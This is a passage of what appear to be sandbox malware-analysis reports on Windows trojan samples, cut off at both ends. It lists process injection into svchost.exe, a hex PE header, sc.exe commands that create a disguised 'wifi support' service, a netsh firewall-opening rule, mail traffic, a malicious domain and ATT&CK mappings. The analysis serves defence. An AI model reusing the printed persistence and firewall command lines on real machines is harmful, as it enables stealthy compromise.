(Handle: 300)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 300)\n \"mdzgxwae.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"mdzgxwae.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"mdzgxwae.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"mdzgxwae.exe\" wrote 86016 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-129", "type": 6, "relevance": 10, "name": "Creates a process in suspended mode (likely for process injection)", "description": "\"mdzgxwae.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00006096)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-83", "type": 6, "relevance": 7, "name": "Writes PE header to memory", "description": "\"mdzgxwae.exe wrote PE header bytes (\"4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000fdb74393b9d62dc0b9d62dc0b9d62dc0b9d62cc028d62dc0b0aebec0b6d62dc0d6a083c0b8d62dc0d6a0b3c0b8d62dc0d6a086c0a2d62dc0d6a0b0c0b8d62dc052696368b9d62dc000000000000000000000000000000000504500004c010400e1db595a0000000000000000e00002010b010a0000e60000004a0000000000006b9a0000001000000000010000000600001000000002000005000100000000000500010000000000005001000004000000000000020040810000100000100000000010000010000000000000100000000000000000000000b0120100a0000000000000000000000000000000000000000000000000000000004001005c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001005c0200000000000000000000000000000000000000000000000000002e74657874000000b0e400000010000000e6000000040000000000000000000000000000200000602e726461746100009a1e0000000001000020000000ea0000000000000000000000000000400000402e64617461000000581900000020010000020000000a0100000000000000000000000000400000c02e72656c6f630000f20f00000040010000100000000c01000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\") to a remote process \"C:\\Windows\\System32\\svchost.exe\"\n which might be an injection preparation attempt ...", "origin": "API Call", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-269", "type": 9, "relevance": 7, "name": "Windows system process connects to a network", "description": "Process \"svchost.exe\" connects to <IPv4>:25", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-10", "type": 7, "relevance": 6, "name": "Sends network traffic on a typical mail related ports", "description": "Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)", "origin": "Network Traffic", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-88", "type": 7, "relevance": 10, "name": "Application communicates with a malicious domain", "description": "Contacted Domain: \"lazystax.ru\" has been identified as malicious", "origin": "Network Traffic", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-303", "type": 9, "relevance": 10, "name": "Starts service using SC.exe", "description": "Process \"sc.exe\" with commandline \"start cygqxrtx\" (UID: 00000000-00005912)", "origin": "Monitored Target", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-15", "type": 9, "relevance": 8, "name": "Modifies firewall settings", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00005856)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9
https://hybrid-analysis.com/sample/888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9
Hybrid Analysis - Um_unhooking
{"size": 10837962, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9", "sha256": "888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9", "av_detect": 85, "vx_family": "Trojan.BrsecmonE", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 8, "total_processes": 9, "total_signatures": 250, "extracted_files": [{"name": "chrmgspr.exe", "file_path": "%TEMP%\\chrmgspr.exe", "file_size": 5242368, "sha256": "f8c0a70a8109f714dce7ffff06c8bee4fee098c87d0da5c87bdf99912e2226e1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "cmd.exe (PID: 6072)", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "chrmgspr.exe.67EE4A8A.bin", "file_size": 14851584, "sha256": "b98ab07e860fe43b840300599a18084bd22a8fa905cce843f957df918f0a2e30", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "CHRMGSPR.EXE.67EE4A8B.bin", "file_size": 14851584, "sha256": "b98ab07e860fe43b840300599a18084bd22a8fa905cce843f957df918f0a2e30", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "dism.log", "file_size": 279804, "sha256": "2a99677842ff32ab9489e4ded2b9efb77e4ae380007e44d20e4a97df42f5dc90", "type_tags": ["text"], "description": "Unicode text, UTF-8 (with BOM) text, with very long lines (312), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "DISMHOST.EXE.67EE524C.bin", "file_size": 82944, "sha256": "ecb636b278261eade712e68ec7d805d20e802628248da872d3d0ada1432ffc11", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24215)", "1 Unknown Objects (build: 24215)", "1 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24215)"], "imported_objects": ["5 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "17 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "30 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "18 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24123)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 91}, "processes": [{"uid": "00000000-00005760", "name": "888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe", "normalized_path": "C:\\888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe", "sha256": "888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9"}, {"uid": "00000000-00006032", "parentuid": "00000000-00005760", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C mkdir %WINDIR%\\system32\\tpxhoiko\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00006072", "parentuid": "00000000-00005760", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C move /Y \"%TEMP%\\chrmgspr.exe\" %WINDIR%\\system32\\tpxhoiko\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00006016", "parentuid": "00000000-00005760", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "create tpxhoiko binPath= \"%WINDIR%\\system32\\tpxhoiko\\chrmgspr.exe /d\\\"C:\\888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\\\"\" type= own start= auto DisplayName= \"wifi support\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00006128", "parentuid": "00000000-00005760", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "description tpxhoiko \"wifi internet conection\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00005936", "parentuid": "00000000-00005760", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "start tpxhoiko", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00004288", "parentuid": "00000000-00005760", "name": "netsh.exe", "normalized_path": "%WINDIR%\\System32\\netsh.exe", "command_line": "advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\system32\\svchost.exe\" enable=yes>nul", "sha256": "661f5d4ce4f0a6cb32669a43ce5deec6d5a9e19b2387f22c5012405e92169943"}, {"uid": "00000000-00004084", "name": "chrmgspr.exe", "normalized_path": "%WINDIR%\\system32\\tpxhoiko\\chrmgspr.exe", "command_line": "/d\"C:\\888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\"", "sha256": "b98ab07e860fe43b840300599a18084bd22a8fa905cce843f957df918f0a2e30"}, {"uid": "00000000-00004144", "parentuid": "00000000-00004084", "name": "svchost.exe", "normalized_path": "%WINDIR%\\system32\\svchost.exe", "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Phishing", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566", "malicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 6, "informative_identifiers_count": 14}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Exploitation for Privilege Escalation", "attck_id": "T1068", "attck_id_wiki": "https://attack.mitre.org/techniques/T1068", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "NTFS File Attributes", "attck_id": "T1564.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 6, "informative_identifiers_count": 21}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": 